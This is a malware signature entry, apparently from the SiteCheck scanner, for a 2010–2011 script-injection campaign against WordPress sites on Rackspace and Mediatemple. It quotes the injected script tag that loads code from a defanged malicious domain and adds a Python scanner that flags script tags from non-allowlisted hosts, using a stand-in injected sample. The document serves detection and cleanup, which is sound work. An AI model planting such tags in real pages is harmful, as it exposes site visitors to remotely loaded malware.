SiteCheck Signatures

malware.rks_injection.2

Description:
Malware injections related to the massive hacks of websites hosted on Rackspace and Mediatemple back in 2010-2011.

Loads malware from a number of external domains; one of them appears in the typical injected code below.

Typical injected code:

<script src=hxxp://azure.smartenergymodel[.]com/js/jquery.min.js>

It infects .php, .html and .js files.
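
A check for the injection pattern described above, as an added example that is not SiteCheck's own signature logic: it lists script tags in .php, .html and .js files whose src host is not on an allowlist. The allowlist, the function names and the sample markup with `.example` hosts are assumptions constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads scripts from (edit per site).
ALLOWED_HOSTS = {"www.site.example", "code.jquery.com", "ajax.googleapis.com"}
SCANNED_SUFFIXES = {".php", ".html", ".js"}  # file types the signature says get infected

# <script ... src=URL>, with the URL unquoted (as in the injected tag) or quoted.
SCRIPT_SRC = re.compile(
    r"""<\s*script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>'"]+))""",
    re.IGNORECASE,
)

def external_script_hosts(text, allowed=ALLOWED_HOSTS):
    """Return (host, url) for every script src whose host is not allowlisted."""
    hits = []
    for m in SCRIPT_SRC.finditer(text):
        url = next(g for g in m.groups() if g is not None).strip()
        if url.startswith("//"):           # protocol-relative URL
            url = "http:" + url
        try:
            host = (urlparse(url).hostname or "").lower()
        except ValueError:                 # malformed URL: report it for review
            host = "<unparsable>"
        if host and host not in allowed:   # relative paths have no host: same-site
            hits.append((host, url))
    return hits

def scan_tree(root, allowed=ALLOWED_HOSTS):
    """Map each infectable file under root to its non-allowlisted script sources."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCANNED_SUFFIXES:
            hits = external_script_hosts(path.read_text(errors="replace"), allowed)
            if hits:
                report[str(path)] = hits
    return report

# Constructed sample: a theme footer with two legitimate tags and one injected tag.
SAMPLE = (
    '<script src="/wp-includes/js/jquery/jquery.js"></script>\n'
    '<script src="https://code.jquery.com/jquery.min.js"></script>\n'
    "<script src=http://cdn.injected.example/js/jquery.min.js></script>\n"
)

if __name__ == "__main__":
    for host, url in external_script_hosts(SAMPLE):
        print(f"unexpected script host {host}: {url}")
```

A hit is a lead for manual review, not a verdict: a legitimate third-party script missing from the allowlist is reported the same way.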

Related links:
http://blog.sucuri.net/2010/06/mass-attack-of-wordpress-blogs-on-rackspace.html
http://blog.unmaskparasites.com/2010/06/14/attack-on-wordpress-blogs-on-rackspace/

Affecting: WordPress websites, mostly on Rackspace and Mediatemple.

Mitigation
How to clean a hacked WordPress site